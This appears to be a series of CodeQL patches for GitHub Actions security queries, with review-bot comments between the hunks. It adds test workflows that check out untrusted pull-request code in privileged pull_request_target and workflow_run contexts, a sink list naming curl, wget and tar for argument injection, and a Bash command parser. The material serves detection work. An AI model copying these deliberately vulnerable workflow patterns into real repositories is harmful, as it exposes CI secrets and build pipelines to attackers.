@@ -0,0 +1,23 @@ +on: + pull_request_target + +jobs: + build: + runs-on: ubuntu-latest + if: github.event.pull_request.head.repo.full_name == github.repository + env: + HEAD: ${{ github.event.pull_request.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml new file mode 100644 index 00000000000..bcde60f55cb --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml @@ -0,0 +1,19 @@ +on: + workflow_run: + workflows: ['Test'] + types: [completed] + +jobs: + build: + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == "success" && github.repository_owner == 'foo' + env: + HEAD: ${{ github.event.workflow_run.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.workflow_run.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml new file mode 100644 index 00000000000..55aa0b41c6c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml 
@@ -0,0 +1,19 @@ +on: + workflow_run: + workflows: ['Test'] + types: [completed] + +jobs: + build: + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == "success" && github.event.workflow_run.head_repository.full_name == github.repository + env: + HEAD: ${{ github.event.workflow_run.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.workflow_run.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 4dc2b53e591..f20fdc79829 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -262,7 +262,15 @@ edges | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | +| .github/workflows/untrusted_checkout_5.yml:11:9:14:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | +| .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | +| .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:21:9:23:23 | Run Step | +| .github/workflows/untrusted_checkout_6.yml:11:9:14:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:14:9:17:6 | Uses Step | +| .github/workflows/untrusted_checkout_6.yml:14:9:17:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:17:9:21:6 | Uses Step | +| .github/workflows/untrusted_checkout_6.yml:17:9:21:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:21:9:23:23 | Run Step | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | +| .github/workflows/workflow_run_untrusted_checkout_3.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_3.yml:16:9:18:31 | Uses Step | #select | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | 
.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/actor_trusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/actor_trusted_checkout.yml | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 81a8c63c882..1d6122b3747 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -18,3 +18,5 @@ | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | From c7fde2a40d87ec164b72990980eaf085e38bf8e5 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 30 Sep 2024 15:35:00 +0200 Subject: [PATCH 0553/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 00d8e21c05d..d79107e06c6 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.59 +version: 0.1.60 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 94468d4b96c..aeaae6dbb91 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.59 +version: 0.1.60 groups: [actions, queries] suites: codeql-suites extractor: javascript From 726392c8b7b65f6efadad21c1ef353c7b56d0fea Mon Sep 17 00:00:00 2001 From: Rasmus Wriedt Larsen Date: Tue, 1 Oct 2024 09:48:16 +0200 Subject: [PATCH 0554/1267] Suppress `actions/cache-poisoning/code-injection` alerts covered by `actions/code-injection/critical` --- ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql | 3 ++- .../Security/CWE-349/CachePoisoningViaCodeInjection.expected | 1 - 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql index 411d0052d4b..fe49b2dd3b5 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql @@ -30,7 +30,8 @@ where check.protects(source.getNode().asExpr(), event, "code-injection") ) and // excluding privileged workflows since they can be exploited in easier circumstances - not job.isPrivileged() and + // which is covered by `actions/code-injection/critical` + not job.isPrivilegedExternallyTriggerable(event) and ( // the workflow runs in the context of the default branch runsOnDefaultBranch(event) 
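Review bot: The comment above `not job.isPrivilegedExternallyTriggerable(event)` still describes the exclusion as "privileged workflows", but the condition now depends on the triggering `event` as well as the job, so the same job can be excluded for one trigger and reported for another. I would reword it to say exactly that, e.g. `// excluding jobs that are privileged and externally triggerable for this event; those are reported by actions/code-injection/critical`. The `where` clause starts and ends outside this hunk.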
diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected index d9f659cbcc3..5c5c26edb4e 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected @@ -8,4 +8,3 @@ nodes subpaths #select | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | ${{ steps.modified_files.outputs.files_modified }} | From ef37e3c59400ff117e577e669a6bb32b5cfd4b7f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 1 Oct 2024 14:22:08 +0200 Subject: [PATCH 0555/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d79107e06c6..af477fb9bf7 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.60 +version: 0.1.61 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index aeaae6dbb91..7b8b9ef321c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.60 +version: 0.1.61 groups: [actions, queries] suites: codeql-suites extractor: javascript From 4b74adec4b7165dc9f10c22dfff791055c3bcedf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:31:59 +0200 Subject: [PATCH 0556/1267] Account for branches filter as a way to prevent workflow_run to trigger on PRs from forks --- ql/lib/codeql/actions/ast/internal/Ast.qll | 11 ++++------- ql/lib/ext/config/argument_injection_sinks.yml | 7 +++++++ 2 files changed, 11 insertions(+), 7 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index d4716f89e19..f2d3698597f 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -722,13 +722,10 @@ class EventImpl extends AstNodeImpl, TEventNode { not this.getName() = "workflow_run" or this.getName() = "workflow_run" and - // workflow_run cannot be externally triggered if they triggering workflow runs in the context of the default branch - // since an attacker can change the triggering workflow from any event to `pull_request` to trigger the workflow - // but in that case, the triggering workflow will run in the context of the PR head branch - ( - not exists(this.getAPropertyValue("branches")) or - this.getAPropertyValue("branches").matches("%*%") - ) + // workflow_run cannot be externally triggered if the triggering workflow runs in the context of the default branch + // An attacker can change the triggering workflow from any event to `pull_request` to trigger the workflow + // in that case, the triggering workflow will run in the context of the PR head branch + not exists(this.getAPropertyValue("branches")) or // the event is `workflow_call` and there is a caller workflow that can be triggered externally this.getName() = "workflow_call" and diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml index 4588af0bf00..ab523c59303 100644 --- a/ql/lib/ext/config/argument_injection_sinks.yml +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -3,7 +3,14 @@ extensions: pack: github/actions-all extensible: argumentInjectionSinksDataModel # https://gtfobins.github.io/ + # https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection/argument-injection data: - ["(awk)(.*?)", 2, 3] + - ["(curl)(.*?)", 2, 3] + - ["(find)(.*?)", 2, 3] + - ["(git)(.*?)", 2, 3] - ["(sed)(.*?)", 2, 3] + - ["(tar)(.*?)", 2, 3] + - ["(wget)(.*?)", 2, 3] + - ["(zip)(.*?)", 2, 3] From 2727bf5e2fdb220f266a0bc90675074c95548d13 Mon Sep 17 00:00:00 2001 
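Review bot: With the wildcard clause removed, any `branches` key on a `workflow_run` trigger now makes the event count as not externally triggerable, including filters such as `'*'` or `'**'` that match every branch name. The removed lines kept those cases in scope through `this.getAPropertyValue("branches").matches("%*%")`; dropping them turns a permissive filter into a suppressor for the queries that rely on this predicate, which looks like a source of false negatives. I would keep the parenthesised disjunction, `( not exists(this.getAPropertyValue("branches")) or this.getAPropertyValue("branches").matches("%*%") )`, or say in the comment why wildcard patterns are considered safe. The enclosing predicate starts and ends outside this hunk.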
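Review bot: The added patterns put no separator between the command name and the argument group, so, if the model regex is applied as written, `(git)(.*?)` or `(tar)(.*?)` would also accept a command whose name merely starts with those letters and report the remainder as its argument. Requiring whitespace, e.g. `- ["(git)\\s+(.*?)", 2, 3]`, would keep each sink to the intended binary; the same applies to the existing `awk` and `sed` rows. Each pattern has two capture groups while the columns reference groups 2 and 3, so presumably the consumer wraps the pattern; that code is outside this hunk and is worth checking against these rows.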
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:33:05 +0200 Subject: [PATCH 0557/1267] Add improved Bash script parser --- ql/lib/codeql/actions/Ast.qll | 4 + ql/lib/codeql/actions/Helper.qll | 100 +++++++++++++++++++-- ql/lib/codeql/actions/ast/internal/Ast.qll | 6 ++ 3 files changed, 104 insertions(+), 6 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 63f2552f582..a4c50ecf55b 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -293,6 +293,10 @@ class Run extends Step instanceof RunImpl { Expression getAnScriptExpr() { result = super.getAnScriptExpr() } string getWorkingDirectory() { result = super.getWorkingDirectory() } + + string getACommand() { result = super.getACommand() } + + predicate getAnAssignment(string name, string value) { super.getAnAssignment(name, value) } } abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index f9fa108ec3a..d6e3042ead3 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -54,7 +54,6 @@ predicate isBashParameterExpansion(string expr, string parameter, string operato ) } -// TODO, the followinr test fails bindingset[raw_content] predicate extractVariableAndValue(string raw_content, string key, string value) { exists(string regexp, string content | content = trimQuotes(raw_content) | @@ -246,10 +245,6 @@ predicate inNonPrivilegedContext(AstNode node) { not node.getEnclosingJob().isPrivilegedExternallyTriggerable(_) } -string partialFileContentRegexp() { - result = ["cat\\s+", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+", "ls\\s+"] -} - bindingset[snippet] predicate outputsPartialFileContent(string snippet) { // e.g. 
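Review bot: `getACommand` and `getAnAssignment` are added to the public `Run` class without QLDoc, and `getAnAssignment` is a predicate with no result although its name reads like a getter. I would document both, e.g. `/** Gets a command found in this step's script, including commands inside command substitutions. */` and `/** Holds if a line of this step's script has the form name=value. */`, and consider a `has…` style name for the second. The same two members are added undocumented to `RunImpl` in `ast/internal/Ast.qll` later in this commit.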
@@ -257,7 +252,7 @@ predicate outputsPartialFileContent(string snippet) { // echo "FOO=$(> $GITHUB_ENV // yq '.foo' foo.yml >> $GITHUB_PATH // cat foo.txt >> $GITHUB_PATH - snippet.regexpMatch(["(\\$\\(|`)<.*", ".*(\\b|^|\\s+)" + partialFileContentRegexp() + ".*"]) + Bash::getACommand(snippet).indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 } string defaultBranchNames() { 
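Review bot: The prefix test `indexOf([...]) = 0` is narrower than the regex it replaces: it needs exactly one space character after the command name, where the old pattern used `\\s+`, and `ls` is no longer in the list that `Bash::partialFileContentCommand()` returns. A tab after `cat`, or a command run through a wrapper so that the name is not the first token, no longer marks the value as file content, which means a missed sink for the env-var, path and output queries that call this predicate. If the narrowing is not intended, `Bash::getACommand(snippet).regexpMatch(["<.*", "(" + Bash::partialFileContentCommand() + ")\\s+.*"])` keeps the whitespace tolerance. If dropping `ls` is deliberate, a comment saying so would help.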
@@ -310,3 +305,96 @@ string normalizePath(string path) { */ bindingset[subpath, path] predicate isSubpath(string subpath, string path) { subpath.substring(0, path.length()) = path } + +module Bash { + string stmtSeparator() { result = ";" } + + string commandSeparator() { result = ["&&", "||"] } + + string pipeSeparator() { result = "|" } + + string splitSeparators() { + result = stmtSeparator() or result = commandSeparator() or result = pipeSeparator() + } + + string redirectionSeparator() { result = [">", ">>", "2>", "2>>", ">&", "2>&", "<", "<<<"] } + + string partialFileContentCommand() { result = ["cat", "jq", "yq", "tail", "head"] } + + bindingset[script] + string getACommand(string script) { + exists(string stmt_, string stmt, string subline2, string cmd | + stmt_ = script.regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n") and + stmt = + [ + // $() command substitution + stmt_ + .regexpFind("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", _, _) + .regexpReplaceAll("^\\$\\(", "") + .regexpReplaceAll("\\)$", ""), + // `...` command substitution + stmt_ + .regexpFind("\\`[^\\`]+\\`", _, _) + .regexpReplaceAll("^\\`", "") + .regexpReplaceAll("\\`$", ""), + // original line with no substitutions + stmt_ + .regexpReplaceAll("\\`[^\\`]+\\`", "SUBCOMMAND") + .regexpReplaceAll("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", "SUBCOMMAND") + ] and + // We shoulg replace quoted arguments with a placeholder to avoid splitting them + // eg: ls | grep -E "*.(tar.gz|zip)$" + //subline2 = subline.regexpReplaceAll("\"([^\"]+)\"", "$0").regexpReplaceAll("'([^']+)'", "$0") and + ( + stmt.regexpMatch(".*\"([^\"]+)\".*") and + exists(int i | + subline2 = + stmt.replaceAll(stmt.regexpFind("\"([^\"]+)\"", _, i), + stmt.regexpFind("\"([^\"]+)\"", _, i) + .replaceAll("|", "::PIPE::") + .replaceAll(";", "::SEMICOLON::") + .replaceAll("&&", "::AND::") + .replaceAll("||", "::OR::")) + ) + or + stmt.regexpMatch(".*'([^']+)'.*") and + exists(int i | + subline2 = + 
stmt.replaceAll(stmt.regexpFind("'([^']+)'", _, i), + stmt.regexpFind("'([^']+)'", _, i) + .replaceAll("|", "::PIPE::") + .replaceAll(";", "::SEMICOLON::") + .replaceAll("&&", "::AND::") + .replaceAll("||", "::OR::")) + ) + or + not stmt.regexpMatch(".*'([^']+)'.*") and + not stmt.regexpMatch(".*\"([^\"]+)\".*") and + subline2 = stmt + ) and + cmd = subline2.splitAt(splitSeparators()).trim() and + // when splitting the line with a separator that is not found, the result is the original line which may contain other separators + // we only one the split parts that do not contain any of the separators + not cmd.indexOf(splitSeparators()) > -1 and + not cmd = + [ + "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", + "case", "esac", "{", "}" + ] and + result = + cmd.replaceAll("::PIPE::", "|") + .replaceAll("::SEMICOLON::", ";") + .replaceAll("::AND::", "&&") + .replaceAll("::OR::", "||") + ) + } + + bindingset[script] + predicate getAnAssignment(string script, string name, string value) { + exists(string stmt | + stmt = script.regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n").trim() and + name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and + value = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) + ) + } +} diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index f2d3698597f..5b96781a10b 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1319,6 +1319,12 @@ class RunImpl extends StepImpl { string getScript() { result = script.getValue().regexpReplaceAll("\\\\\\s*\n", "") } + string getACommand() { result = Bash::getACommand(this.getScript()) } + + predicate getAnAssignment(string name, string value) { + Bash::getAnAssignment(this.getScript(), name, value) + } + ScalarValueImpl getScriptScalar() { result = TScalarValueNode(script) } ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } 
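Review bot: `Bash::getACommand` loses commands on a line that mixes different separators, because `subline2.splitAt(splitSeparators())` splits on one separator value at a time and the following `not cmd.indexOf(splitSeparators()) > -1` discards every part that still holds another separator. For `a | b && c` the parts are `a`, `b && c`, `a | b` and `c`, so `b` is never returned and a query built on `Run.getACommand()` will not see it. Rewriting all separators to one token before the split avoids that, e.g. `cmd = subline2.regexpReplaceAll("&&|\\|\\||\\||;", "\n").splitAt("\n").trim()`. The quote masking has a related gap: `exists(int i | …)` masks one quoted string per result and the double-quote and single-quote branches are alternatives, so a separator inside a second quoted string on the same line is still split on.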
From a5075e52161509c245e0e0390ce4929e189c450f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:33:42 +0200 Subject: [PATCH 0558/1267] Change queries to use the new bash parser --- .../security/ArgumentInjectionQuery.qll | 14 ++-- .../security/ArtifactPoisoningQuery.qll | 64 ++++++------------- .../codeql/actions/security/ControlChecks.qll | 11 ++-- .../security/EnvPathInjectionQuery.qll | 7 +- .../actions/security/EnvVarInjectionQuery.qll | 7 +- .../security/OutputClobberingQuery.qll | 11 ++-- .../actions/security/PoisonableSteps.qll | 8 +-- .../security/UntrustedCheckoutQuery.qll | 36 +++++------ 8 files changed, 61 insertions(+), 97 deletions(-) diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index 37f966668df..6e1a5c0f229 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -28,13 +28,13 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { ) or exists( - Run run, string line, string argument, string regexp, int argument_group, int command_group + Run run, string cmd, string argument, string regexp, int argument_group, int command_group | - run.getScript().splitAt("\n") = line and + run.getACommand() = cmd and run.getScriptScalar() = this.asExpr() and argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - argument = line.regexpCapture(regexp, argument_group) and - command = line.regexpCapture(regexp, command_group) and + argument = cmd.regexpCapture(regexp, argument_group) and + command = cmd.regexpCapture(regexp, command_group) and argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") ) } 
@@ -60,12 +60,12 @@ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { source instanceof RemoteFlowSource or exists( - Run run, string argument, string line, string regexp, int command_group, int argument_group + Run run, string argument, string cmd, string regexp, int command_group, int argument_group | run.getScriptScalar() = source.asExpr() and - run.getScript().splitAt("\n") = line and + run.getACommand() = cmd and argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - argument = line.regexpCapture(regexp, argument_group) and + argument = cmd.regexpCapture(regexp, argument_group) and argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") ) } diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index ebe22140be2..b7015590614 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll 
@@ -155,71 +155,54 @@ class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, Use } override string getPath() { - if - this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + if this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) - .getScript() - .splitAt("\n") + .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else - if this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) + if this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) then result = "GITHUB_WORKSPACE/" else none() } } class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { - string script; - GHRunArtifactDownloadStep() { // eg: - run: gh run download ${{ github.event.workflow_run.id }} --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - this.getScript() = script and - script.splitAt("\n").regexpMatch(".*gh\\s+run\\s+download.*") and - script.splitAt("\n").matches("%github.event.workflow_run.id%") and + this.getACommand().regexpMatch(".*gh\\s+run\\s+download.*") and + this.getACommand().matches("%github.event.workflow_run.id%") and ( - script.splitAt("\n").regexpMatch(unzipRegexp()) or - this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) + this.getACommand().regexpMatch(unzipRegexp()) or + this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) ) } override string getPath() { if - this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or - script.splitAt("\n").regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or + this.getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - 
normalizePath(trimQuotes(script - .splitAt("\n") + normalizePath(trimQuotes(this.getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) - .getScript() - .splitAt("\n") + .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else if - this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) or - script.splitAt("\n").regexpMatch(unzipRegexp()) + this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) or + this.getACommand().regexpMatch(unzipRegexp()) then result = "GITHUB_WORKSPACE/" else none() } } class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { - string script; - DirectArtifactDownloadStep() { // eg: // run: | 
@@ -230,32 +213,25 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { // gh api $url > "$name.zip" // unzip -d "$name" "$name.zip" // done - this.getScript() = script and - script.splitAt("\n").matches("%github.event.workflow_run.artifacts_url%") and + this.getACommand().matches("%github.event.workflow_run.artifacts_url%") and ( - script.splitAt("\n").regexpMatch(unzipRegexp()) or - this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) + this.getACommand().regexpMatch(unzipRegexp()) or + this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) ) } override string getPath() { if - script.splitAt("\n").regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or - this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + this.getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or + this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - normalizePath(trimQuotes(script - .splitAt("\n") + normalizePath(trimQuotes(this.getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) - .getScript() - .splitAt("\n") + .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else result = "GITHUB_WORKSPACE/" } diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 134ce780eee..801ccb6e986 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll 
